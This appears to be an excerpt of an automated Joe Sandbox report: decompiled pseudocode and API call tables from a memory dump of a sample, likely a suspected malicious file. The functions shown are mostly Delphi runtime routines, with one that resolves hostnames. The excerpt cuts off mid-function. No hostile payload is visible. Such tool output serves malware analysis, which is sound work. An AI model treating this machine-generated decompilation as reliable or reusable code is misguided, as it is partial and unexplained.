    0x00403d0e
    0x00403c9a
    0x00403ca3
    0x00403cb3
    0x00403cb3
    0x00403ccf
    0x00403cf0
    0x00403cf0

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040B9A0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41
    C-Code - Quality: 100%
    			E0040B9A0() {
				struct HINSTANCE__** _t2;
				void* _t3;
				struct HINSTANCE__** _t5;
				struct HRSRC__* _t7;
				struct HINSTANCE__** _t8;
				intOrPtr* _t11;
				intOrPtr* _t12;
				struct HINSTANCE__* _t13;

				_t2 =  *0x452f9c; // 0x45402c
				if( *_t2 != 0) {
					_t5 =  *0x452f9c; // 0x45402c
					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
					_t8 =  *0x452f9c; // 0x45402c
					return LoadResource( *_t8, _t7);
				}
				_t3 = 0;
				_t11 =  *0x4530b8; // 0x419034
				_t12 =  *_t11;
				if(_t12 != 0) {
					while(1) {
						_t13 =  *(_t12 + 4);
						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
						if(_t3 != 0) {
							goto L5;
						}
						_t12 =  *_t12;
						if(_t12 != 0) {
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t3;
			}











    0x0040b9a3
    0x0040b9ab
    0x0040b9b4
    0x0040b9bc
    0x0040b9c2
    0x00000000
    0x0040b9ca
    0x0040b9d1
    0x0040b9d3
    0x0040b9d9
    0x0040b9dd
    0x0040b9df
    0x0040b9e8
    0x0040b9f3
    0x0040b9fa
    0x00000000
    0x00000000
    0x0040b9fc
    0x0040ba00
    0x00000000
    0x00000000
    0x00000000
    0x0040ba00
    0x0040b9df
    0x0040ba05
    0x0040ba05

    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00405945, Relevance: 9.0, APIs: 6, Instructions: 41
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
				 *0x419008 = 2;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454046 = 2;
				 *0x454000 = E00404B04;
				if(E00402F5C() != 0) {
					_t3 = E00402F8C();
				}
				E00403050(_t3);
				 *0x45404c = 0xd7b0;
				 *0x454218 = 0xd7b0;
				 *0x4543e4 = 0xd7b0;
				 *0x45403c = GetCommandLineA();
				 *0x454038 = E004012C0();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x4545b8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x454030 = _t11;
				return _t11;
			}





    0x00405945
    0x0040594a
    0x0040594f
    0x00405951
    0x00405958
    0x00405962
    0x0040596c
    0x00405973
    0x00405984
    0x00405986
    0x00405986
    0x0040598b
    0x00405990
    0x00405999
    0x004059a2
    0x004059b0
    0x004059ba
    0x004059ce
    0x00405a07
    0x004059d0
    0x004059de
    0x004059f6
    0x004059e0
    0x004059e0
    0x004059e0
    0x004059de
    0x00405a0c
    0x00405a11
    0x00405a16

    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040A980, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40ab3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x453064; // 0x405f58
					E00405824(_t52,  &_v8);
				} else {
					_t86 =  *0x453120; // 0x405f50
					E00405824(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x453068; // 0x405f00
					E00405824(_t60,  &_v372);
					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004040F8( &_v340, 0x105,  &_v297);
					E00407660(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x4530a0; // 0x405ff8
					E00405824(_t82,  &_v344);
					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040AB42);
				E00403E88( &_v372);
				E00403EAC( &_v344, 3);
				return E00403E88( &_v8);
			}

































    0x0040a980
    0x0040a98d
    0x0040a993
    0x0040a999
    0x0040a99f
    0x0040a9a5
    0x0040a9aa
    0x0040a9ab
    0x0040a9b0
    0x0040a9b3
    0x0040a9b9
    0x0040a9c0
    0x0040a9d4
    0x0040a9d9
    0x0040a9c2
    0x0040a9c5
    0x0040a9ca
    0x0040a9ca
    0x0040a9de
    0x0040a9eb
    0x0040a9f7
    0x0040aab3
    0x0040aab9
    0x0040aac3
    0x0040aac9
    0x0040aad0
    0x0040aad6
    0x0040aaec
    0x0040aaf1
    0x0040ab03
    0x0040aa1a
    0x0040aa1d
    0x0040aa23
    0x0040aa3b
    0x0040aa4c
    0x0040aa57
    0x0040aa5d
    0x0040aa67
    0x0040aa6d
    0x0040aa74
    0x0040aa7a
    0x0040aa90
    0x0040aa95
    0x0040aaa7
    0x0040aaac
    0x0040ab0c
    0x0040ab0f
    0x0040ab12
    0x0040ab1d
    0x0040ab2d
    0x0040ab3a

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040A31C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t74 = 0x40a49c;
				_t86 = 0x40a49c;
				_t83 =  *0x406188; // 0x4061d4
				if(E004032A0(_t87, _t83) != 0) {
					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00407764(_t74, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00407764(_v8, _t86);
			}































    0x0040a31c
    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040A31A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t75 = 0x40a49c;
				_t89 = 0x40a49c;
				_t85 =  *0x406188; // 0x4061d4
				if(E004032A0(_t92, _t85) != 0) {
					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00407764(_t75, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00407764(_v8, _t89);
			}































    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00402F8C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
    C-Code - Quality: 65%
    			E00402F8C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x419020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x419020; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x419020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402FFD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403004);
					return RegCloseKey(_v8);
				}
			}












    0x00402f8d
    0x00402f8f
    0x00402f99
    0x00402fb5
    0x00403004
    0x00403016
    0x00403019
    0x00403022
    0x00402fb7
    0x00402fb9
    0x00402fba
    0x00402fbf
    0x00402fc2
    0x00402fc5
    0x00402fe1
    0x00402fe8
    0x00402feb
    0x00402fee
    0x00402ffc
    0x00402ffc

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040A038, Relevance: 7.6, APIs: 5, Instructions: 50
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40a0cf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
				_t29 = E00407174(0x40a0e4, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x454764;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040A0D6);
				return E00403E88( &_v8);
			}










    0x0040a038
    0x0040a03b
    0x0040a040
    0x0040a041
    0x0040a046
    0x0040a049
    0x0040a05f
    0x0040a071
    0x0040a07b
    0x0040a08b
    0x0040a090
    0x0040a095
    0x0040a09a
    0x0040a09a
    0x0040a0a0
    0x0040a0a3
    0x0040a0a3
    0x0040a0b4
    0x0040a0b4
    0x0040a0bb
    0x0040a0be
    0x0040a0c1
    0x0040a0ce

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040A0E8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40a2b2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00403E88(__edx);
				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404148(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x419108], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404150(_t122, 0x40a30c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404070();
												E00404150(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404150(_t122, 0x40a300);
										_t92 = _t92 + 1;
									}
								} else {
									E00404150(_t122, 0x40a2ec);
									_t92 = _t92 + 3;
								}
							} else {
								E00404150(_t122, 0x40a2d8);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040B04C(_t124, _t92);
							E004043A8(_t124, _v8, _t92,  &_v20);
							E00404150(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x45473c; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00403EDC(_t122, _t124);
					} else {
						while(_t92 <= E00404148(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404070();
									E00404150(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040A2B9);
				return E00403EAC( &_v24, 4);
			}























    0x0040a0e8
    0x0040a0ed
    0x0040a0ee
    0x0040a0ef
    0x0040a0f0
    0x0040a0f1
    0x0040a0f5
    0x0040a0f7
    0x0040a0fb
    0x0040a0fc
    0x0040a101
    0x0040a104
    0x0040a107
    0x0040a10e
    0x0040a126
    0x0040a13e
    0x0040a288
    0x0040a28a
    0x0040a28f
    0x0040a291
    0x00000000
    0x00000000
    0x0040a1a7
    0x0040a1ac
    0x0040a1b3
    0x0040a1f1
    0x0040a1f6
    0x0040a1f8
    0x0040a217
    0x0040a21c
    0x0040a21e
    0x0040a23f
    0x0040a244
    0x0040a246
    0x0040a25b
    0x0040a25b
    0x0040a25d
    0x0040a263
    0x0040a26a
    0x0040a25f
    0x0040a25f
    0x0040a261
    0x0040a278
    0x0040a282
    0x00000000
    0x00000000
    0x00000000
    0x0040a261
    0x0040a248
    0x0040a24f
    0x0040a254
    0x0040a254
    0x0040a220
    0x0040a227
    0x0040a22c
    0x0040a22c
    0x0040a1fa
    0x0040a201
    0x0040a206
    0x0040a206
    0x0040a287
    0x0040a287
    0x0040a1b5
    0x0040a1be
    0x0040a1cc
    0x0040a1d6
    0x0040a1db
    0x0040a1db
    0x0040a1b3
    0x0040a144
    0x0040a144
    0x0040a149
    0x0040a14c
    0x0040a15a
    0x0040a156
    0x0040a156
    0x0040a156
    0x0040a15e
    0x0040a199
    0x0040a160
    0x0040a185
    0x0040a166
    0x0040a166
    0x0040a168
    0x0040a16a
    0x0040a16c
    0x0040a175
    0x0040a17f
    0x0040a17f
    0x0040a16c
    0x0040a184
    0x0040a184
    0x0040a184
    0x0040a190
    0x0040a15e
    0x0040a297
    0x0040a299
    0x0040a29c
    0x0040a29f
    0x0040a2b1

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0041763C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				void* _t22;
				void* _t35;
				intOrPtr* _t38;
				void* _t47;

				_t47 = __ecx;
				_t38 = __edx;
				E00403E88(__ecx);
				if(_t38 == 0) {
					return E00403EDC(_t47, "0.0.0.0");
				}
				if( *_t38 + 0xd0 - 0xa >= 0) {
					_t22 = E00404348(_t38);
					_push(_t22);
					L0040C4F8();
					if(_t22 != 0) {
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v20 = 0;
						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
					}
				} else {
					_t35 = E00404348(_t38);
					_push(_t35);
					L0040C4C8();
					_t22 = _t35 + 1;
					if(_t22 != 0) {
						return E00403EDC(_t47, _t38);
					}
				}
				return _t22;
			}















    0x00417642
    0x00417644
    0x00417648
    0x0041764f
    0x00000000
    0x004176e4
    0x0041765b
    0x0041767a
    0x0041767f
    0x00417680
    0x00417687
    0x00417695
    0x00417699
    0x004176a3
    0x004176a7
    0x004176b1
    0x004176b5
    0x004176bf
    0x004176c3
    0x00000000
    0x004176d6
    0x0041765d
    0x0041765f
    0x00417664
    0x00417665
    0x0041766a
    0x0041766b
    0x00000000
    0x00417671
    0x0041766b
    0x004176ef

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 004185E8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				char _v20;
				int _t28;
				char* _t41;
				intOrPtr _t47;
				void* _t51;

				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t51);
				_push(0x418692);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
